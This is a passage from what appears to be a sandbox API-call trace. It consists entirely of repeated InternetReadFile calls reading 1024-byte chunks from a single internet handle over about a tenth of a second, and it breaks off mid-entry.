[0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.968] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0232.968] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.044] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.044] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.046] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.047] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.047] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.047] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.047] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.048] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.050] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.050] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.051] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.051] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.052] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.052] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.053] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.053] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.053] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.054] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.054] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.054] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.054] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.055] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.055] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.055] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.055] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983b0 | out: lpBuffer=0x1983c4*, lpdwNumberOfBytesRead=0x1983b0*=0x400) returned 1 [0233.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983c4, dwNumberOfBytesToRead=0x400, 